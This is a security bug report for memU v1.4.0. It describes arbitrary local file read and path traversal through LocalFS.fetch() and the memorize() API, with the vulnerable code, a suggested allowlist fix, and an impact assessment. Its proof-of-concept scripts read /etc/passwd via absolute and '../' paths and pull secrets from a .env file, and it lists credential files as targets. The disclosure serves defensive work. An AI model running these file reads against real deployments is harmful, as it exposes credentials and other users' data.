[BUG] [SECURITY] Arbitrary local file read via resource_url in LocalFS.fetch() #385

@aliceQWAS

Description

LocalFS.fetch() in src/memu/blob/local_fs.py reads and returns the contents of any local file when the resource_url parameter points to an existing filesystem path. The method checks pathlib.Path(url).exists() and, if true, copies the file into the blob directory; for the "conversation", "text", and "document" modalities it also returns the file's full text content. No directory allowlist, path restriction, or file type validation is applied.

The vulnerable code at src/memu/blob/local_fs.py:57-67:

async def fetch(self, url: str, modality: str) -> tuple[str, str | None]:
    p = pathlib.Path(url)
    if p.exists():
        dst = self.base / p.name
        if str(p.resolve()) != str(dst.resolve()):
            shutil.copyfile(p, dst)                     # copies ANY readable file
        text = None
        if modality in ("conversation", "text", "document"):
            text = dst.read_text(encoding="utf-8")      # returns full file contents
        return str(dst), text

An attacker who can call the memorize() API with a controlled resource_url can read any file accessible to the process, including:

  • /etc/passwd and /etc/shadow (if permissions allow)
  • .env files containing API keys, database credentials, and cloud secrets
  • /proc/self/environ (environment variables, often containing secrets)
  • SSH private keys, TLS certificates, application config files
  • Other users' data on the filesystem

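Path traversal sequences (e.g., ../../../etc/passwd) are also accepted: pathlib.Path(url) keeps the .. components as given, the operating system follows them when exists() looks up the path, and fetch() never checks where the resolved path ends up.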
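
A small sketch of why traversal sequences pass an existence check. It uses only the standard library and a throwaway directory tree; the names root, blob_dir, and traversal are illustrative and do not come from the memU code base.

```python
import pathlib
import tempfile

# Build a throwaway tree: <root>/secret.txt and <root>/blobs/nested/
root = pathlib.Path(tempfile.mkdtemp())
(root / "secret.txt").write_text("top secret", encoding="utf-8")
blob_dir = root / "blobs" / "nested"
blob_dir.mkdir(parents=True)

# A traversal path that starts inside the blob directory but points outside it.
traversal = blob_dir / ".." / ".." / "secret.txt"

# pathlib keeps the ".." components literally; it does not normalize them.
has_dotdot = ".." in traversal.parts

# exists() succeeds because the OS follows ".." while looking up the path.
found = traversal.exists()

# Only resolve() yields the canonical location, which lies outside blob_dir.
canonical = traversal.resolve()
escapes = not canonical.is_relative_to(blob_dir.resolve())

print(has_dotdot, found, escapes)
```

An existence check alone therefore says nothing about where the file lives; containment has to be tested on the resolved path.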

This is reachable through:

  • The memorize() library API
  • The memU-server HTTP endpoint POST /api/v3/memory/memorize
  • The LangGraph save_memory tool integration

Environment

Ubuntu 22.04 (Docker), also reproduced on macOS 15.4

Steps to reproduce

  1. Install memU v1.4.0:

    pip install memu-py==1.4.0
  2. Run the proof of concept:

    import asyncio
    import tempfile
    from memu.blob.local_fs import LocalFS
    
    async def poc():
        fs = LocalFS(tempfile.mkdtemp())
    
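        # Read /etc/passwd via an absolute path
        _, text = await fs.fetch("/etc/passwd", "document")
        print(f"Read {len(text)} characters from /etc/passwd")
        print(text[:200])
    
        # Path traversal also works. The path is relative to the current
        # working directory, so add more "../" segments if run from a deeper one.
        _, text = await fs.fetch("../../../etc/passwd", "document")
        print(f"Path traversal read {len(text)} characters")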
    
    asyncio.run(poc())
  3. Observe that the full contents of /etc/passwd are returned.

  4. Demonstrate reading application secrets:

    import asyncio
    import os
    import tempfile
    from memu.blob.local_fs import LocalFS
    
    async def poc():
        # Create a simulated .env file
        env_path = os.path.join(tempfile.gettempdir(), ".env.poc_test")
        with open(env_path, "w") as f:
            f.write("OPENAI_API_KEY=sk-proj-FAKE_KEY_1234567890\n")
            f.write("DATABASE_URL=postgresql://admin:s3cret@prod-db:5432/memu\n")
            f.write("AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n")
    
        fs = LocalFS(tempfile.mkdtemp())
        _, text = await fs.fetch(env_path, "document")
        print(text)  # All secrets printed
        os.unlink(env_path)
    
    asyncio.run(poc())
  5. Observe that all secrets from the .env file are returned in full.

  6. The same attack works through the public memorize() API:

    import asyncio
    from memu import Memu
    
    async def poc():
        client = Memu(...)
        await client.memorize(resource_url="/etc/passwd", modality="document")
        # File contents are now stored in memory and retrievable
        results = await client.list_memory_items()
    
    asyncio.run(poc())

Expected behavior

Local file access in LocalFS.fetch() should be restricted to a configured allowlist of directories (e.g., only the blob storage directory itself). Absolute paths and path traversal sequences that resolve outside the allowed directories should be rejected.
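
One possible shape for such a check, as a minimal sketch rather than a proposed patch. The helper resolve_allowed, the exception PathNotAllowedError, and the allowed_dirs parameter are hypothetical names that do not exist in memU; the sketch assumes Python 3.9+ for Path.is_relative_to().

```python
import pathlib
import tempfile


class PathNotAllowedError(ValueError):
    """Raised when a path resolves outside every allowed directory (hypothetical name)."""


def resolve_allowed(url: str, allowed_dirs: list[pathlib.Path]) -> pathlib.Path:
    """Return the canonical path for url, or raise if it escapes allowed_dirs."""
    # resolve() collapses ".." components and follows symlinks, so the
    # containment check runs against the real target rather than the raw input.
    candidate = pathlib.Path(url).resolve()
    for allowed in allowed_dirs:
        if candidate.is_relative_to(allowed.resolve()):
            return candidate
    raise PathNotAllowedError(f"{url!r} is outside the allowed directories")


# Usage: only files under the blob directory are accepted.
blob_dir = pathlib.Path(tempfile.mkdtemp())
(blob_dir / "note.txt").write_text("hello", encoding="utf-8")

inside = resolve_allowed(str(blob_dir / "note.txt"), [blob_dir])

rejected = []
for bad in ("/etc/passwd", str(blob_dir / ".." / "outside.txt")):
    try:
        resolve_allowed(bad, [blob_dir])
    except PathNotAllowedError:
        rejected.append(bad)

print(inside, rejected)
```

A fetch() implementation could call a helper like this before copying or reading anything, and operate only on the returned canonical path. Because the check and the later read are separate steps, a deployment that lets untrusted users create symlinks inside an allowed directory would likely need additional hardening beyond this sketch.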

Version

memU v1.4.0 (commit 163d050, memu-py PyPI package)

Severity

Critical

Additional Information

The vulnerability requires no authentication and no user interaction. A single API call can read any file on the filesystem that the process has permissions to access. In typical deployments, this exposes .env files with API keys and database credentials, application configuration, and system files. The file contents are stored in the memory database and can be retrieved by the attacker at any time.
